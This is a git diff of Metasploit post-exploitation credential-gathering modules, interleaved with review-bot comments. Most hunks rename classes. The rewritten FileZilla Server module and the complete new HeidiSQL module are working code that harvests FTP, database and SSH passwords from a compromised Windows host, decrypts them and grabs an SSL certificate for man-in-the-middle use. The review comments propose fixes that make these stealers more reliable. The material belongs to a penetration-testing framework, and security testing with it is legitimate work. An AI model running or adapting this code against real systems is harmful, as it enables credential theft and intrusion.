9a6f9595cc..339e1d204f 100644 --- a/modules/post/windows/gather/credentials/enum_laps.rb +++ b/modules/post/windows/gather/credentials/enum_laps.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 8d7e09e1f8..68ef4520ac 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb 
+++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index 7abf8eb39a..fd8df3bf25 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/dns/resolver' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 4fd3ca037e..e127602c7c 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File 
@@ -37,38 +37,61 @@ class Metasploit3 < Msf::Post return end - @progs = "#{session.sys.config.getenv('ProgramFiles')}\\" + progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432') + locations = [] + progfiles_env.each do |k, v| + next if v.blank? + locations << v + "\\FileZilla Server\\" + end - filezilla = check_filezilla + keys = [ + "HKLM\\SOFTWARE\\FileZilla Server", + "HKLM\\SOFTWARE\\Wow6432Node\\FileZilla Server", + ] + + keys.each do |key| + begin + root_key, base_key = session.sys.registry.splitkey(key) + value = session.sys.registry.query_value_direct(root_key, base_key, "install_dir") + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + next + end + locations << value.data + "\\" + end + + locations = locations.uniq + filezilla = check_filezilla(locations) get_filezilla_creds(filezilla) if filezilla end - def check_filezilla + def check_filezilla(locations) paths = [] - path = @progs + "FileZilla Server\\" - - print_status("Checking for Filezilla Server directory in: #{path}") - begin - session.fs.dir.entries(path) + locations.each do |location| + print_status("Checking for Filezilla Server directory in: #{location}") + begin + session.fs.dir.foreach("#{location}") do |fdir| + ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| + if fdir == xmlfile + filepath = location + xmlfile + print_good("Configuration file found: #{filepath}") + paths << filepath + end + end + end + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + end + end rescue ::Exception => e print_error(e.to_s) return end - session.fs.dir.foreach(path) do |fdir| - ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| - if fdir == xmlfile - filepath = path + xmlfile - vprint_status("Configuration file found: #{filepath}") - paths << filepath - end - end - end - if !paths.empty? 
- print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") + print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{session.sid}") print_line return paths end @@ -160,7 +183,7 @@ class Metasploit3 < Msf::Post session.db_record ? (source_id = session.db_record.id) : (source_id = nil) service_data = { - address: ::Rex::Socket.getaddress(session.sock.peerhost, true), + address: session.session_host, port: config['ftp_port'], service_name: 'ftp', protocol: 'tcp', @@ -189,7 +212,7 @@ class Metasploit3 < Msf::Post # Merge in the service data and create our Login login_data.merge!(service_data) - login = create_credential_login(login_data) + create_credential_login(login_data) end perms.each do |perm| @@ -201,13 +224,12 @@ class Metasploit3 < Msf::Post session.db_record ? (source_id = session.db_record.id) : (source_id = nil) # report the goods! - if config['ftp_port'] == "<none>" + if config['admin_pass'] == "<none>" vprint_status("Detected Default Adminstration Settings:") - config['ftp_port'] = "21" else vprint_status("Collected the following configuration details:") service_data = { - address: ::Rex::Socket.getaddress(session.sock.peerhost, true), + address: session.session_host, port: config['admin_port'], service_name: 'filezilla-admin', protocol: 'tcp', @@ -235,7 +257,7 @@ class Metasploit3 < Msf::Post # Merge in the service data and create our Login login_data.merge!(service_data) - login = create_credential_login(login_data) + create_credential_login(login_data) end vprint_status(" FTP Port: #{config['ftp_port']}") 
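Review bot: In `run`, the registry-derived entry `locations << value.data + "\\"` is appended without normalising it, so `locations.uniq` only removes byte-identical strings. If `install_dir` already ends in a backslash, or differs in case from the environment-derived path, the same directory is walked twice and `check_filezilla` returns each XML path twice, which presumably produces duplicate records further down. I would strip and re-add the separator before comparing: `dir = value.data.to_s.sub(/\\+\z/, '')`, `locations << "#{dir}\\" unless dir.empty?`, and `locations = locations.uniq(&:downcase)`; the `to_s` also covers a value that comes back without data, which the `RequestError` rescue would not catch. The outer `rescue ::Exception` kept as context in `check_filezilla` still traps interrupts, and `rescue StandardError` is sufficient now that the inner rescue handles `RequestError`.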
@@ -249,31 +271,33 @@ class Metasploit3 < Msf::Post configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'], config['admin_pass'], config['ssl'], config['ssl_certfile'], config['ssl_keypass']] + begin + lastser = parse_interface(fsi_xml) + lastserver << [lastser['ip'], lastser['port'], lastser['password']] + vprint_status("Last Server Information:") + vprint_status(" IP: #{lastser['ip']}") + vprint_status(" Port: #{lastser['port']}") + vprint_status(" Password: #{lastser['password']}") + vprint_line - lastser = parse_interface(fsi_xml) - lastserver << [lastser['ip'], lastser['port'], lastser['password']] - - vprint_status("Last Server Information:") - vprint_status(" IP: #{lastser['ip']}") - vprint_status(" Port: #{lastser['port']}") - vprint_status(" Password: #{lastser['password']}") - vprint_line - - p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, + rescue + vprint_error("Could not parse FileZilla Server Interface.xml") + end + loot_path = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, "filezilla_server_credentials.csv", "FileZilla FTP Server Credentials") - print_status("Credentials saved in: #{p.to_s}") + print_status("Credentials saved in: #{loot_path}") - p = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv, + loot_path = store_loot("filezilla.server.perms", "text/csv", session, permissions.to_csv, "filezilla_server_permissions.csv", "FileZilla FTP Server Permissions") - print_status("Permissions saved in: #{p.to_s}") + print_status("Permissions saved in: #{loot_path}") - p = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv, + loot_path = store_loot("filezilla.server.config", "text/csv", session, configuration.to_csv, "filezilla_server_configuration.csv", "FileZilla FTP Server Configuration") - print_status(" Config saved in: #{p.to_s}") + print_status(" Config saved in: #{loot_path}") - 
p = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv, + loot_path = store_loot("filezilla.server.lastser", "text/csv", session, lastserver.to_csv, "filezilla_server_lastserver.csv", "FileZilla FTP Last Server") - print_status(" Last server history: #{p.to_s}") + print_status(" Last server history: #{loot_path}") print_line end @@ -289,16 +313,16 @@ class Metasploit3 < Msf::Post begin doc = REXML::Document.new(data).root - rescue REXML::ParseException => e + rescue REXML::ParseException print_error("Invalid xml format") end opt = doc.elements.to_a("Settings/Item") if opt[1].nil? # Default value will only have a single line, for admin port - no adminstration settings settings['admin_port'] = opt[0].text rescue "<none>" - settings['ftp_port'] = "<none>" + settings['ftp_port'] = 21 else - settings['ftp_port'] = opt[0].text rescue "<none>" + settings['ftp_port'] = opt[0].text rescue 21 settings['admin_port'] = opt[16].text rescue "<none>" end settings['admin_pass'] = opt[17].text rescue "<none>" 
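Review bot: The bare `rescue` added around `parse_interface(fsi_xml)` discards the exception, so an unrelated bug inside the block (a NoMethodError from a renamed key, for instance) is reported as a parse failure with no detail. Bind the exception and include it in the message: `rescue StandardError => e` and `vprint_error("Could not parse FileZilla Server Interface.xml: #{e.class} #{e.message}")`. The `begin` also wraps the `vprint_status` lines, which have nothing to do with parsing; keeping only the `parse_interface` call and the `lastserver <<` line inside it would make the scope of the rescue match its message. The enclosing method starts outside this hunk.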
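Review bot: After `rescue REXML::ParseException` prints "Invalid xml format", execution falls through to `doc.elements.to_a("Settings/Item")` with `doc` still nil, so malformed XML ends in a NoMethodError instead of the clean error the message promises. The `parse_interface` hunk later in this file adds `return lastser` for exactly this case; the same early exit is needed here, returning whatever the rest of this method (outside the hunk) normally returns. Separately, `settings['ftp_port']` is now the Integer `21` on the default paths but a String when read from the XML; `"21"` would keep the type consistent for consumers such as `port: config['ftp_port']`.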
@@ -321,17 +345,14 @@ class Metasploit3 < Msf::Post end settings['ftp_bindip'] = "0.0.0.0" if settings['ftp_bindip'] == "*" || settings['ftp_bindip'].empty? - if settings['ssl'] == "1" - settings['ssl'] = "true" - else - if datastore['SSLCERT'] - print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file") - end - settings['ssl'] = "false" + settings['ssl'] = settings['ssl'] == "1" + if !settings['ssl'] && datastore['SSLCERT'] + print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file") end settings['ssl_certfile'] = items[45].text rescue "<none>" - if settings['ssl_certfile'] != "<none>" and settings['ssl'] == "true" and datastore['SSLCERT'] # lets get the file if its there could be useful in MITM attacks + # Get the file if it is there. It could be useful in MITM attacks + if settings['ssl_certfile'] != "<none>" && settings['ssl'] and datastore['SSLCERT'] sslfile = session.fs.file.new(settings['ssl_certfile']) until sslfile.eof? sslcert << sslfile.read @@ -386,7 +407,7 @@ class Metasploit3 < Msf::Post account['host'] = settings['ftp_bindip'] account['port'] = settings['ftp_port'] - account['ssl'] = settings['ssl'] + account['ssl'] = settings['ssl'].to_s creds << account vprint_status(" Username: #{account['user']}") @@ -413,15 +434,23 @@ class Metasploit3 < Msf::Post begin doc = REXML::Document.new(data).root - rescue REXML::ParseException => e + rescue REXML::ParseException print_error("Invalid xml format") + return lastser end opt = doc.elements.to_a("Settings/Item") - lastser['ip'] = opt[0].text rescue "<none>" - lastser['port'] = opt[1].text rescue "<none>" - lastser['password'] = opt[2].text rescue "<none>" + opt.each do |item| + case item.attributes['name'] + when /Address/ + lastser['ip'] = item.text + when /Port/ + lastser['port'] = item.text + when /Password/ + lastser['password'] = item.text + end + end lastser['password'] = "<none>" if lastser['password'].nil? 
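Review bot: The rewritten certificate condition mixes `&&` with `and`, which gives the intended grouping only because `and` binds more loosely than `&&`; use `&&` throughout: `if settings['ssl_certfile'] != "<none>" && settings['ssl'] && datastore['SSLCERT']`. `settings['ssl']` also changes here from the strings "true"/"false" to a Boolean, so any comparison against the old string values elsewhere in the file needs the same update (the `account['ssl'] = settings['ssl'].to_s` hunk covers one such use). The body of this method continues outside the hunk.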
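Review bot: The `when /Address/`, `when /Port/` and `when /Password/` patterns in `parse_interface` are unanchored, so any `Settings/Item` whose name merely contains one of those words is accepted and a later match silently overwrites an earlier one. If the attribute names are fixed, compare them as exact strings or anchor the patterns, e.g. `when /\A<exact item name>\z/` (placeholder; take the names from a real Interface.xml). Only `lastser['password']` gets a `"<none>"` fallback afterwards, so unless `lastser` is pre-filled outside this hunk, `ip` and `port` stay nil when no item matches; `lastser['ip'] ||= "<none>"` and `lastser['port'] ||= "<none>"` would keep the CSV row consistent with the password column.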
diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index efb320bb2d..8fe7912e4b 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/ftpnavigator.rb b/modules/post/windows/gather/credentials/ftpnavigator.rb index 55c98131a2..b5ab541420 100644 --- a/modules/post/windows/gather/credentials/ftpnavigator.rb +++ b/modules/post/windows/gather/credentials/ftpnavigator.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/ftpx.rb b/modules/post/windows/gather/credentials/ftpx.rb index 0423d9d277..8fec8928ec 100644 --- a/modules/post/windows/gather/credentials/ftpx.rb +++ b/modules/post/windows/gather/credentials/ftpx.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles def initialize(info={}) diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb index ba0bacb968..548591ceed 100644 --- a/modules/post/windows/gather/credentials/gpp.rb +++ b/modules/post/windows/gather/credentials/gpp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' require 'rex/parser/group_policy_preferences' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File include Msf::Post::Windows::Priv 
diff --git a/modules/post/windows/gather/credentials/heidisql.rb b/modules/post/windows/gather/credentials/heidisql.rb new file mode 100644 index 0000000000..2b9d262719 --- /dev/null +++ b/modules/post/windows/gather/credentials/heidisql.rb 
@@ -0,0 +1,178 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' +require 'msf/core/auxiliary/report' + +class MetasploitModule < Msf::Post + include Msf::Post::Windows::Registry + include Msf::Auxiliary::Report + include Msf::Post::Windows::UserProfiles + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows Gather HeidiSQL Saved Password Extraction', + 'Description' => %q{ + This module extracts saved passwords from the HeidiSQL client. These + passwords are stored in the registry. They are encrypted with a custom algorithm. + This module extracts and decrypts these passwords. + }, + 'License' => MSF_LICENSE, + 'Author' => ['h0ng10'], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def run + userhives=load_missing_hives() + userhives.each do |hive| + next if hive['HKU'].nil? + print_status("Looking at Key #{hive['HKU']}") + begin + subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\HeidiSQL\\Servers") + if subkeys.blank? 
+ print_status("HeidiSQL not installed for this user.") + next + end + + service_types = { 0 => 'mysql', + 1 => 'mysql-named-pipe', + 2 => 'mysql-ssh', + 3 => 'mssql-named-pipe', + 4 => 'mssql', + 5 => 'mssql-spx-ipx', + 6 => 'mssql-banyan-vines', + 7 => 'mssql-windows-rpc', + 8 => 'postgres'} + + subkeys.each do |site| + site_key = "#{hive['HKU']}\\Software\\HeidiSQL\\Servers\\#{site}" + host = registry_getvaldata(site_key, "Host") || "" + user = registry_getvaldata(site_key, "User") || "" + port = registry_getvaldata(site_key, "Port") || "" + db_type = registry_getvaldata(site_key, "NetType") || "" + prompt = registry_getvaldata(site_key, "LoginPrompt") || "" + ssh_user = registry_getvaldata(site_key, "SSHtunnelUser") || "" + ssh_host = registry_getvaldata(site_key, "SSHtunnelHost") || "" + ssh_port = registry_getvaldata(site_key, "SSHtunnelPort") || "" + ssh_pass = registry_getvaldata(site_key, "SSHtunnelPass") || "" + win_auth = registry_getvaldata(site_key, "WindowsAuth") || "" + epass = registry_getvaldata(site_key, "Password") + + # skip if windows authentication is used (mssql only) + next if db_type.between?(3,7) and win_auth == 1 + next if epass == nil or epass == "" or epass.length == 1 or prompt == 1 + pass = decrypt(epass) + print_good("Service: #{service_types[db_type]} Host: #{host} Port: #{port} User: #{user} Password: #{pass}") + + service_data = { + address: host == '127.0.0.1' ? 
rhost : host, + port: port, + service_name: service_types[db_type], + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :session, + session_id: session_db_id, + post_reference_name: self.refname, + private_type: :password, + private_data: pass, + username: user + } + + credential_data.merge!(service_data) + + + # Create the Metasploit::Credential::Core object + credential_core = create_credential(credential_data) + + # Assemble the options hash for creating the Metasploit::Credential::Login object + login_data ={ + core: credential_core, + status: Metasploit::Model::Login::Status::UNTRIED + } + + # Merge in the service data and create our Login + login_data.merge!(service_data) + login = create_credential_login(login_data) + + + # if we have a MySQL via SSH connection, we need to store the SSH credentials as well + if db_type == 2 then + + print_good("Service: ssh Host: #{ssh_host} Port: #{ssh_port} User: #{ssh_user} Password: #{ssh_pass}") + + service_data = { + address: ssh_host, + port: ssh_port, + service_name: 'ssh', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :session, + session_id: session_db_id, + post_reference_name: self.refname, + private_type: :password, + private_data: ssh_pass, + username: ssh_user + } + + credential_data.merge!(service_data) + + # Create the Metasploit::Credential::Core object + credential_core = create_credential(credential_data) + + # Assemble the options hash for creating the Metasploit::Credential::Login object + login_data ={ + core: credential_core, + status: Metasploit::Model::Login::Status::UNTRIED + } + + # Merge in the service data and create our Login + login_data.merge!(service_data) + login = create_credential_login(login_data) + + end + end + rescue ::Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + print_error("Cannot Access User SID: #{hive['HKU']} : #{e.message}") + end + end + 
unload_our_hives(userhives) + end + + def decrypt(encoded) + decoded = "" + shift = Integer(encoded[-1,1]) + encoded = encoded[0,encoded.length-1] + + hex_chars = encoded.scan(/../) + hex_chars.each do |entry| + x = entry.to_i(16) - shift + decoded += x.chr(Encoding::UTF_8) + end + + return decoded + end +end diff --git a/modules/post/windows/gather/credentials/idm.rb b/modules/post/windows/gather/credentials/idm.rb index 6590172922..ed8e72c93e 100644 --- a/modules/post/windows/gather/credentials/idm.rb +++ b/modules/post/windows/gather/credentials/idm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index db8a566a30..28e6aec748 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Post imail_user = datastore['IMAILUSER'] imail_domain = datastore['IMAILDOMAIN'] - print_status("Download iMail user information...") if datastore['VERBOSE'] == false + vprint_status("Download iMail user information...") #Download user data. If no user specified, we dump it all. users = download_info(imail_user, imail_domain) diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 239eb67dd2..01956553e6 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb 
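Review bot: `unload_our_hives(userhives)` at the end of `run` is skipped whenever anything other than a `RequestError` is raised inside the loop, which leaves the hives loaded by `load_missing_hives` mounted on the host. Two such exceptions are reachable from this file alone: `db_type.between?(3,7)` raises ArgumentError when `NetType` is missing and `db_type` is the `""` default, and `decrypt` raises ArgumentError or RangeError when the stored value does not end in a digit or a hex pair is smaller than the shift. Move the unload into an `ensure`, compare `db_type` only when it is an Integer, and skip a record whose password cannot be decoded, as sketched below. `decrypt` also deserves a comment stating what the code shows: the last character is a decimal shift and the rest are hex pairs offset by it, so the stored value is obfuscated rather than encrypted as the module description says.

```ruby
  def run
    userhives = load_missing_hives
    begin
      # … unchanged: userhives.each loop, with the two changes below inside it …
    ensure
      # Runs on every exit path so no hive stays loaded after an error
      unload_our_hives(userhives)
    end
  end

          # inside subkeys.each, replacing the between? guard and the decrypt call:
          next if db_type.is_a?(Integer) && db_type.between?(3, 7) && win_auth == 1
          # … unchanged: empty-password / LoginPrompt guard …
          begin
            pass = decrypt(epass)
          rescue ArgumentError, RangeError => e
            vprint_error("Skipping #{site}: stored password is not in the expected format (#{e.class})")
            next
          end
```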
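Review bot: In imail.rb, replacing `print_status(...) if datastore['VERBOSE'] == false` with `vprint_status(...)` inverts when the message appears: the old line printed only with VERBOSE off, the new one only with VERBOSE on. If the original intent was a short progress line for non-verbose runs, a plain `print_status("Download iMail user information...")` preserves it; if the old condition was a mistake, the commit message should say so. The surrounding method lies outside this hunk.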
@@ -10,7 +10,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb b/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb index 87d870ebc4..8756884945 100644 --- a/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb +++ b/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/meebo.rb b/modules/post/windows/gather/credentials/meebo.rb index 44364a50e4..97714cd53e 100644 --- a/modules/post/windows/gather/credentials/meebo.rb +++ b/modules/post/windows/gather/credentials/meebo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 6658d6c797..bcc7ff14e8 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -9,7 +9,7 @@ require 'rex' require 'rexml/document' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb index f1d00c5d0b..32bd184558 100644 --- a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb 
+++ b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb @@ -9,7 +9,7 @@ require 'msf/core/auxiliary/report' require 'msf/core/post/windows/mssql' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::MSSQL diff --git a/modules/post/windows/gather/credentials/nimbuzz.rb b/modules/post/windows/gather/credentials/nimbuzz.rb index f42fa10637..61ee3a02e8 100644 --- a/modules/post/windows/gather/credentials/nimbuzz.rb +++ b/modules/post/windows/gather/credentials/nimbuzz.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index bca5db7416..2b7f673fc4 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb index 9d5d445164..591cb8b158 100644 --- a/modules/post/windows/gather/credentials/razer_synapse.rb +++ b/modules/post/windows/gather/credentials/razer_synapse.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'openssl' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb index a01bb9b7b8..15904682b1 100644 --- a/modules/post/windows/gather/credentials/razorsql.rb 
+++ b/modules/post/windows/gather/credentials/razorsql.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'openssl' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/rdc_manager_creds.rb b/modules/post/windows/gather/credentials/rdc_manager_creds.rb index 45f0e8ed0d..dcb6c71378 100644 --- a/modules/post/windows/gather/credentials/rdc_manager_creds.rb +++ b/modules/post/windows/gather/credentials/rdc_manager_creds.rb @@ -10,7 +10,7 @@ require 'rex' require 'rexml/document' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/skype.rb b/modules/post/windows/gather/credentials/skype.rb index f950de44e5..208f0e5351 100644 --- a/modules/post/windows/gather/credentials/skype.rb +++ b/modules/post/windows/gather/credentials/skype.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb index cb0fce4d6e..402e30f37b 100644 --- a/modules/post/windows/gather/credentials/smartermail.rb +++ b/modules/post/windows/gather/credentials/smartermail.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/smartftp.rb b/modules/post/windows/gather/credentials/smartftp.rb index 1fa9bba41f..be08299ad5 100644 --- a/modules/post/windows/gather/credentials/smartftp.rb +++ b/modules/post/windows/gather/credentials/smartftp.rb 
@@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles def initialize(info={}) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index c3461846d4..56df968c5f 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'openssl' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/sso.rb b/modules/post/windows/gather/credentials/sso.rb index d2584ecf2c..0225b853bc 100644 --- a/modules/post/windows/gather/credentials/sso.rb +++ b/modules/post/windows/gather/credentials/sso.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/post/windows/priv' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/steam.rb b/modules/post/windows/gather/credentials/steam.rb index f17abf7c5c..2db1ce9589 100644 --- a/modules/post/windows/gather/credentials/steam.rb +++ b/modules/post/windows/gather/credentials/steam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb index 731d3da103..27ebffe316 100644 --- a/modules/post/windows/gather/credentials/tortoisesvn.rb +++ b/modules/post/windows/gather/credentials/tortoisesvn.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb index 1f51aabd04..51e71c843d 100644 --- a/modules/post/windows/gather/credentials/total_commander.rb +++ b/modules/post/windows/gather/credentials/total_commander.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/trillian.rb b/modules/post/windows/gather/credentials/trillian.rb index a80e9bef9e..1d4b76bfeb 100644 --- a/modules/post/windows/gather/credentials/trillian.rb +++ b/modules/post/windows/gather/credentials/trillian.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index a4488e672e..5229692c3a 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -10,7 +10,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'rex/proto/rfb' -class Metasploit3 < 